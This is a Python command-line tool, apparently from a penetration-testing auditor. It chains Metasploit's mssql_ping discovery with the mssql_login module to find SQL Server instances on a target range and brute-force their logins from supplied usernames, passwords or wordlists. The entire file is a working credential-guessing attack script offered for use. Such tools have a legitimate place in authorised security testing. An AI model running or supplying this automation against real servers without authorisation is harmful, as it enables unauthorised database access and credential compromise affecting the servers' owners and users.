#!/usr/bin/env python3
'''
@author: Matthew C. Jones, CPA, CISA, OSCP, CCFE
IS Audits & Consulting, LLC
TJS Deemer Dana LLP
-------------------------------------------------------------------------------
Chain together metasploit mssql_ping and brute force to allow direct brute
forcing of MSSQL servers using browser service on UDP 1434
-------------------------------------------------------------------------------
TODO - dunno?
'''
import sys
import argparse
import subprocess
import re
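def main(argv):
    """Locate MSSQL instances with Metasploit's mssql_ping, then run mssql_login against each.

    Args:
        argv: command-line arguments without the program name. They are handed to
            argparse here (the previous version ignored the parameter and read
            sys.argv implicitly).

    Returns:
        None. The de-colourised stdout of every msfconsole run is printed to stdout;
        anything msfconsole writes to stderr is echoed to stderr.

    Raises:
        FileNotFoundError: if ``msfconsole`` is not on PATH (previously the shell
            swallowed this and the script silently found nothing).
    """
    parser = argparse.ArgumentParser(description='Find SQL servers using msf mssql_ping and brute force em')
    parser.add_argument("--wordlist", "-w", default="", action="store", help='wordlist in user:pass format')
    parser.add_argument("--username", "-u", default="", action="store", help='username')
    parser.add_argument("--password", "-p", default="", action="store", help='password')
    parser.add_argument("--userfile", "-U", default="", action="store", help='user file')
    parser.add_argument("--passfile", "-P", default="", action="store", help='password file')
    parser.add_argument("--domain", "-d", default="", action="store", help='domain / workgroup to use for windows authentication')
    parser.add_argument("target", action="store", help="target")
    args = parser.parse_args(argv)

    # Strip ANSI colour sequences from msfconsole output so the regexes see plain text.
    # See https://stackoverflow.com/questions/14693701/how-can-i-remove-the-ansi-escape-sequences-from-a-string-in-python
    # Color codes only - r'\x1B\[[0-?]*[ -/]*[@-~]'
    # All ANSI escape codes - r'(\x9B|\x1B\[)[0-?]*[ -/]*[@-~]'
    ansi_escape = re.compile(r'\x1B\[[0-?]*[ -/]*[@-~]')

    ping_script = (
        "use auxiliary/scanner/mssql/mssql_ping;"
        "set RHOSTS " + args.target + ";"
        "run;"
        "exit -y"
    )
    output = _run_msfconsole(ping_script, ansi_escape)

    # mssql_ping reports "... information for <ip>" followed later by "tcp = <port>";
    # findall yields a list of (ip, port) tuples, e.g.
    # [('10.54.76.2', '64599'), ('10.54.76.130', '60820')]
    instance_re = re.compile(r'information for (\d*\.\d*\.\d*\.\d*)[\s\S]+?tcp\s*=\s*(\d*)')
    instances = instance_re.findall(output)
    if not instances:
        print("mssql_ping reported no SQL Server instances", file=sys.stderr)

    for host, port in instances:
        login_script = _build_login_script(host, port, args)
        _run_msfconsole(login_script, ansi_escape)


def _build_login_script(host, port, args):
    """Return the msfconsole command string for mssql_login against host:port.

    Credential selection mirrors the original precedence: a user:pass wordlist
    (USERPASS_FILE) wins outright; otherwise USERNAME beats USER_FILE and PASSWORD
    beats PASS_FILE, each pair chosen independently. A domain switches on
    Windows authentication.
    """
    commands = [
        "use auxiliary/scanner/mssql/mssql_login",
        "set RHOSTS " + host,
        "set RPORT " + port,
    ]
    if args.domain:
        commands.append("set USE_WINDOWS_AUTHENT true")
        commands.append("set DOMAIN " + args.domain)
    if args.wordlist:
        commands.append("set USERPASS_FILE " + args.wordlist)
    else:
        if args.username:
            commands.append("set USERNAME " + args.username)
        elif args.userfile:
            commands.append("set USER_FILE " + args.userfile)
        if args.password:
            commands.append("set PASSWORD " + args.password)
        elif args.passfile:
            commands.append("set PASS_FILE " + args.passfile)
    commands.append("run")
    commands.append("exit -y")
    return ";".join(commands)


def _run_msfconsole(script, ansi_escape):
    """Run msfconsole non-interactively with *script* and return its de-colourised stdout.

    The command is passed as an argv list rather than a shell string, so option
    values containing shell metacharacters (quotes, ';', '$(...)') cannot alter the
    command line; they still reach msfconsole verbatim. Output is decoded to text
    before the regex substitution (the previous bytes/str mix raised TypeError on
    Python 3). msfconsole's stderr is echoed instead of being discarded.
    """
    cmd = ["msfconsole", "-q", "-n", "-x", script]
    # Echo the invocation in the same shape the old shell command was printed.
    print("msfconsole -q -n -x '" + script + "'")
    proc = subprocess.run(
        cmd,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,
    )
    output = ansi_escape.sub('', proc.stdout)
    print(output)
    if proc.stderr:
        print(proc.stderr, file=sys.stderr)
    return output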
if __name__ == "__main__":
    # Drop the program name; main() hands the rest to argparse.
    cli_args = sys.argv[1:]
    main(cli_args)